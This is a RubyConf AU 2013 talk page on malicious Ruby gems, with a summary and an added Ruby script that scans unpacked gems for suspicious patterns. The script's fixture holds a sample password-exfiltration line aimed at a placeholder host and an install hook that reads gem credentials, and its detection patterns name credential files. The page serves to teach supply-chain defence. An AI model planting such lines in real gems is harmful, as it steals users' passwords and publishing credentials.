Description
RubyConf AU 2013: http://www.rubyconf.org.au

What's the worst that could happen if your app has a dependency on a malicious gem? How easy would it be to write a gem that could compromise a box? Much of the Ruby community blindly trusts our gems. This talk will make you second guess that trust. It will also show you how to vet gems that you do choose to use.

There are four malicious gems I will be presenting:

- Harvesting passwords from requests going through a Rails app
- Exposing the contents of a Rails app's database
- Compromising the source code of a Rails app
- Providing SSH access to a box at 'gem install' time and stealing gem cutter credentials (and going viral)

My talk will increase awareness that these sorts of gems can exist in the wild, show how easy it is for anyone to build malicious gems, and give easy techniques for identifying these gems.
Summary
In the talk titled "Hacking With Gems," presented by Benjamin Smith at RubyConf AU 2013, the focus is on the potential dangers associated with using Ruby gems, particularly malicious ones. Smith initiates the conversation by questioning the community's blind trust in gems, noting that even seemingly trivial gems can pose significant security risks.

The key points discussed include:

- **Malicious Potential**: Smith reveals how easy it is to create gems designed to harvest sensitive data or compromise applications.
- **Types of Malicious Gems**: Four specific examples of malicious gems are presented:
  - A gem that harvests passwords from Rails app requests.
  - A gem that exposes the Rails app's database contents.
  - A gem that compromises the source code of a Rails application.
  - A gem that grants SSH access upon installation and steals credentials.
- **Creating Malicious Gems**: Smith describes the process of writing a harmless-looking gem that secretly collects sensitive data, emphasizing that anyone can create such a gem without advanced skills.
- **Detecting Malicious Code**: Techniques for identifying and mitigating risks from malicious gems are discussed, including monitoring outgoing network calls and examining gem source code.
- **Community Trust**: The speaker raises concerns about trust in popular gems, indicating that malicious code can be embedded even in widely-used libraries.
- **Prevention Strategies**: Suggestions for safeguarding against malicious gems include rigorous vetting of dependencies, using private repositories, monitoring changes in the system, and possibly signing gems to ensure authenticity.

Smith concludes with a strong recommendation that attendees should not blindly trust gems and should write their own code where feasible. He encourages vigilance in monitoring installed gems and emphasizes the importance of understanding the functionalities and behaviors of these dependencies.

Through a mix of humor and serious warnings, Smith's talk serves as an eye-opener about the cybersecurity implications within the Ruby ecosystem.
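As an added example of the "examine gem source code" vetting step (not code from the talk or the speaker), the script below walks an unpacked gem directory and flags the constructs behind the four scenarios above: network egress, shell execution, dynamic code loading, credential-file access, request/parameter sniffing, and an `extconf.rb` install hook. The fixture gem it scans is constructed inline and is not a real gem; every hit is a prompt for manual review, not a verdict.

```ruby
require "fileutils"
require "tmpdir"

# Heuristic indicators mapped to the talk's four scenarios. A hit means
# "read this file by hand", not "this gem is malicious".
INDICATORS = {
  "network egress"         => /Net::HTTP|open-uri|TCPSocket|Socket\.tcp/,
  "shell execution"        => /\b(system|exec|spawn|popen|Open3)\b|`[^`\n]+`/,
  "dynamic code loading"   => /\b(eval|instance_eval|class_eval|Marshal\.load)\b/,
  "credential file access" => %r{\.gem/credentials|database\.yml|\.ssh/|authorized_keys},
  "request/param sniffing" => /params\[:password\]|rack\.input|Rack::Request/,
}.freeze

# Walk an unpacked gem (e.g. after `gem unpack foo.gem`) and return
# [relative_path, line_number, indicator] triples. extconf.rb is flagged on
# its own (line 0) because it runs arbitrary Ruby during `gem install`.
def audit_gem_dir(dir)
  findings = []
  Dir.glob(File.join(dir, "**", "*")).sort.each do |path|
    next unless File.file?(path)
    rel = path.delete_prefix("#{dir}/")
    findings << [rel, 0, "install-time hook (extconf.rb)"] if File.basename(rel) == "extconf.rb"
    next unless rel.match?(/\.(rb|rake|gemspec)\z/) || rel.start_with?("bin/")
    File.foreach(path).with_index(1) do |line, no|
      INDICATORS.each { |label, re| findings << [rel, no, label] if line.match?(re) }
    end
  end
  findings
end

# Constructed fixture (hypothetical, not a real gem): a "helpful logger" gem
# shaped like the talk's password-harvesting and install-time examples.
def write_sample_gem(dir)
  FileUtils.mkdir_p([File.join(dir, "lib"), File.join(dir, "ext")])
  File.write(File.join(dir, "lib", "helpful.rb"), <<~RUBY)
    require "net/http"
    # looks like request logging, actually ships the password field off-box
    def log(params) = Net::HTTP.post_form(URI("http://collector.invalid/"), pw: params[:password])
  RUBY
  File.write(File.join(dir, "ext", "extconf.rb"), <<~RUBY)
    system("cat ~/.gem/credentials")  # runs during gem install, not app boot
  RUBY
  dir
end

# Build the fixture in a temp dir, audit it, and return the findings.
def demo
  Dir.mktmpdir { |d| audit_gem_dir(write_sample_gem(d)) }
end

demo.each { |rel, no, what| puts "#{rel}:#{no}: #{what}" } if __FILE__ == $PROGRAM_NAME
```

Run it against a real gem with `gem unpack name.gem` followed by `audit_gem_dir("name-x.y.z")`; the findings are a reading list for the reviewer, and a clean result does not prove a gem safe.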